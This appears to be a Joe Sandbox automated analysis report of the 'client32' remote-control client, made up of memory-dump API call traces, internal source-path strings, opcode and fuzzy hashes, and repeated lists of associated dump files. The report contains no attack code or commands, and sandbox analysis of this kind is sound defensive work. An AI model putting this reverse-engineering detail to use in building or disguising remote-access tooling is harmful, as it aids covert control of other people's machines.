• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 2755825785-2830328467
• Opcode ID: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
• Instruction ID: 59158522108a3a71f1e5bb0466e943617169e98ae829cc3baa7e2fe2b27ff523
• Opcode Fuzzy Hash: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
• Instruction Fuzzy Hash: 5841C271E00B46DBCB15CF68C9C8B6EB7F1EF44344F10856AD8569B644EBB0E940CB98
APIs
• GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 6CA86D0A
• GetProcAddress.KERNEL32(?,InternetReadFile), ref: 6CA86D72
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc
• String ID: InternetQueryDataAvailable$InternetReadFile
• API String ID: 190572456-1434219782
• Opcode ID: 495d9d464fb4d690c56c46f7ca0d25682a93c5ebbe6d8809b1b706e9285b50ec
• Instruction ID: 77cf094f4f67f7aeb281d9e1241688bf5f278c33191b0f8dfb0291c316364d55
• Opcode Fuzzy Hash: 495d9d464fb4d690c56c46f7ca0d25682a93c5ebbe6d8809b1b706e9285b50ec
• Instruction Fuzzy Hash: 62313772A011A99FEB20DF68CCC1AD9B7F4FF09309B2449A9E588D7700D670A9C5CF10
APIs
• _memmove.LIBCMT ref: 110D1378
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcess_memmovewsprintf
• String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
• API String ID: 1528188558-323366856
• Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
• Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
• Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
• Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398
APIs
• GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 6CA86D0A
• GetProcAddress.KERNEL32(?,InternetReadFile), ref: 6CA86D72
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc
• String ID: InternetQueryDataAvailable$InternetReadFile
• API String ID: 190572456-1434219782
APIs
• GetProcAddress.KERNEL32(00000000,0000000E), ref: 11160E88
  • Part of subcall function 11160D17: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 11160D4F
  • Part of subcall function 11160D17: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 11160D90
  • Part of subcall function 11160D17: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 11160DB4
  • Part of subcall function 11160D17: RegCloseKey.ADVAPI32(?), ref: 11160DE1
• LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 11160E4A
• LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 11160E60
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
• String ID: hhctrl.ocx
• API String ID: 1060647816-2298675154
APIs
• GetDC.USER32(00000000), ref: 11005981
• ReleaseDC.USER32(00000000,00000000), ref: 110059BC
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcessReleasewsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 3704029381-2830328467
APIs
• EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
• LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,1EF76653), ref: 1105D59E
• SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,1EF76653), ref: 1105D5A8
Strings
• Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterEventLeave
• String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
• API String ID: 3094578987-11999416
APIs
• SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B969F
• MoveWindow.USER32(8D111949,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA885), ref: 110B96D8
• SetTimer.USER32(8D111949,0000050D,000007D0,00000000), ref: 110B9710
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoMoveParametersSystemTimerWindow
                                                                                                                                                    • String ID: Max
                                                                                                                                                    • API String ID: 1521622399-2772132969
                                                                                                                                                    • Opcode ID: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                                                                                                    • Instruction ID: 87ccea237e2aa79ae125a3322bdb2c24729383307459d143463b3682e3a222a8
                                                                                                                                                    • Opcode Fuzzy Hash: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                                                                                                    • Instruction Fuzzy Hash: A2213DB5A40309AFD714DFA4C885FAFF7B8EB48710F10452EE96597380CB70A941CBA0
                                                                                                                                                    APIs
                                                                                                                                                    • _memmove.LIBCMT ref: 111535AC
                                                                                                                                                    • _memmove.LIBCMT ref: 111535E6
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                                                                                                    • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                                                                                                    • API String ID: 6605023-1396654219
                                                                                                                                                    • Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                                                                                    • Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
                                                                                                                                                    • Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                                                                                    • Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(00000000,00000001), ref: 110395E6
                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 110395EE
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                    • API String ID: 1136984157-1986719024
                                                                                                                                                    • Opcode ID: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                                                                                    • Instruction ID: 55b3f6273447a840922a2276b3415970a39c2bc3f54fc53508d86eb1e8118ba0
                                                                                                                                                    • Opcode Fuzzy Hash: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                                                                                    • Instruction Fuzzy Hash: C3F0C876640219BFD710CE55DCC6F9BB39CEB88754F108425F61597280D6B1E84087A4
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                    • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                                                                                    • API String ID: 819365019-2727927828
                                                                                                                                                    • Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                                                                                    • Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
                                                                                                                                                    • Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                                                                                    • Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindow.USER32(?), ref: 110ED498
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcessWindowwsprintf
• String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
• API String ID: 2577986331-1331251348
• Opcode ID: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
• Instruction ID: 93283a680bb1c801d139a1839617fb2f1f19efec68c8bcedb592c4b0da2aa86f
• Opcode Fuzzy Hash: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
• Instruction Fuzzy Hash: 8DF0E279E036327BD612A9177C0AFCFF768DBA1AA9F058061F80D26101EB34720082E9
APIs
  • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F466
  • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
  • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F484
  • Part of subcall function 1103F450: Sleep.KERNEL32(00000014), ref: 1103F497
  • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
  • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F4AF
• IsWindow.USER32(00000000), ref: 1103F4EA
• SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103F4FD
Strings
• PCIVideoSlave32, xrefs: 1103F508
• DoMMData - could not find %s window, xrefs: 1103F50D
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$Find$MessageSendSleep
• String ID: DoMMData - could not find %s window$PCIVideoSlave32
• API String ID: 1010850397-3146847729
• Opcode ID: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
• Instruction ID: 9c7747beff98129d0e206a6ba61550f1bc8c1a2fc0044bc1d9efbb7d24d88507
• Opcode Fuzzy Hash: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
• Instruction Fuzzy Hash: BBF02735E8121C77D710AA98AC0ABEEBB689B0170EF004098ED1966280EBB5251087DB
APIs
• _free.LIBCMT ref: 110816D7
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcess_freewsprintf
• String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
• API String ID: 2441568934-1875806619
• Opcode ID: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
• Instruction ID: 681d8586094b0eb4f99e23d602ddbaf233b7ff3414f9fb7bc0106feac7c5022a
• Opcode Fuzzy Hash: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
• Instruction Fuzzy Hash: E8F027B8F083221FEA30DE54BC02BC9F7D01F0824CF080494E9C327240E7B26818C6E2
APIs
  • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,757323A0,1100BF7B), ref: 11110928
  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
• _free.LIBCMT ref: 1103D221
  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
